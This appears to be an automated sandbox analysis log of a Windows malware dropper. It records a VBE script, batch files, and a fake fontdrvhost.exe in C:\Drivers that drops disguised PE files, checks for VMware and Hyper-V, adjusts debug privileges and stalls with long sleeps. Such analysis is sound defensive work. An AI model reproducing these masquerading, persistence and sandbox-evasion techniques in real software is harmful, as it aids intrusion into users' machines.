                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1A730000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: AD0000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1A460000 memory reserve | memory write watch
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMemory allocated: 1060000 memory reserve | memory write watch
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMemory allocated: 1A970000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599653Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599545Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599435Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599323Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599085Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598893Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597038Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596930Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599862
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599469
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 3600000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598891
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598750
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598625
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598485
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598374
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598203
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598047
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597844
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597703
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597591
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597328
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597184
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597062
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596953
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596828
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596719
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596609
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596494
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596354
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596250
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596141
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 300000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596016
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595906
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595797
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595688
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595578
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595458
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595343
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595234
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595120
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 594985
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 594860
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 594719
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeWindow / User API: threadDelayed 574Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeWindow / User API: threadDelayed 4171Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeWindow / User API: threadDelayed 4743
                                    Source: C:\Drivers\fontdrvhost.exeWindow / User API: threadDelayed 4888
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\sRuyTvnC.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LRGWtOLy.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\BimGJlFQ.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MihenAyR.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\tWFZTedC.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\jqKBOCJa.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RKjvWuQm.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\bsCLGWVU.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aFStzZSn.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\knlJjCXV.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CANODYsk.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\szTqaJAi.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\jWKBqQkB.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\iIcaGucE.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599891s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599766s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599653s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599545s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599435s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599323s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -599085s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -598893s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -100000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99844s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99719s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99610s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99453s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99344s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99235s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -99092s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98984s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98875s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98761s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98641s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98516s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98407s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -98282s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -597038s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6812Thread sleep time: -596930s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6020Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe TID: 7148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe TID: 1308Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7192Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 280Thread sleep time: -30000s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -22136092888451448s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -600000s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -599862s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -599469s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7372Thread sleep time: -14400000s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598891s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598750s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598625s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598485s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598374s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598203s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -598047s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -597844s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -597703s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -597591s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -597328s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -597184s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -597062s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596953s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596828s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596719s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596609s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596494s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596354s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596250s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596141s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7372Thread sleep time: -600000s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -596016s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595906s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595797s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595688s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595578s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595458s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595343s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595234s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -595120s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -594985s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -594860s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -594719s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -100000s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -99890s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -99757s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -99655s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -99329s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -99193s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -98937s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -98794s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -98670s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -98559s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7388Thread sleep time: -98450s >= -30000s
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00FAA69B
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00FBC220
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBE6A3 VirtualQuery,GetSystemInfo,0_2_00FBE6A3
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599653Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599545Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599435Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599323Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599085Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598893Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 100000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99844Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99719Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99610Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99453Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99344Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99235Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99092Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98984Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98875Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98761Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98641Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98516Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98407Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98282Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597038Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596930Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 30000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599862
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599469
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 3600000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598891
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598750
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598625
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598485
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598374
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598203
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 598047
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597844
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597703
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597591
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597328
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597184
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597062
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596953
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596828
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596719
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596609
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596494
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596354
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596250
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596141
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 300000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596016
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595906
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595797
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595688
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595578
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595458
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595343
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595234
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 595120
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 594985
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 594860
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 594719
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 100000
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99890
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99757
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99655
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99329
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99193
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98937
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98794
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98670
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98559
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98450
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeThread delayed: delay time: 922337203685477
                                    Source: wscript.exe, 00000001.00000002.1672953073.00000000029AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Sl
                                    Source: fontdrvhost.exe, 00000004.00000002.1762220412.000000001C1A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: fontdrvhost.exe, 0000001A.00000002.2922468166.000000001AEE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                                    Source: wscript.exe, 00000001.00000002.1672953073.00000000029AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: fontdrvhost.exe, 00000004.00000002.1764575398.000000001C9E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`
                                    Source: fontdrvhost.exe, 00000004.00000002.1763422195.000000001C241000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeAPI call chain: ExitProcess graph end nodegraph_0-24894
                                    Source: C:\Drivers\fontdrvhost.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FBF838
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FC7DEE mov eax, dword ptr fs:[00000030h]0_2_00FC7DEE
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FCC030 GetProcessHeap,0_2_00FCC030
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess token adjusted: Debug
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: Debug
                                    Source: C:\Drivers\fontdrvhost.exeProcess token adjusted: Debug
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FBF838
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBF9D5 SetUnhandledExceptionFilter,0_2_00FBF9D5
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FBFBCA
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FC8EBD
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
